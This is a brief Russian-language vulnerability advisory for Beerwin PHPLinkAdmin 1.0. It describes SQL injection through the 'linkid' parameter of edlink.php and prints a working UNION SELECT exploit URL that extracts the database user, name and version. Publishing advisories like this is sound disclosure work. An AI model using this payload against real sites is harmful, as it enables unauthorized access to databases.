Программа: Beerwin PHPLinkAdmin 1.0

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «linkid» сценарием edlink.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.

Эксплоит:

http://127.0.0.1/path/edlink.php?linkid=-1′ union all select
1,2,3,4,concat_ws(0x3a,user(),database(),version())’—



Оставить мнение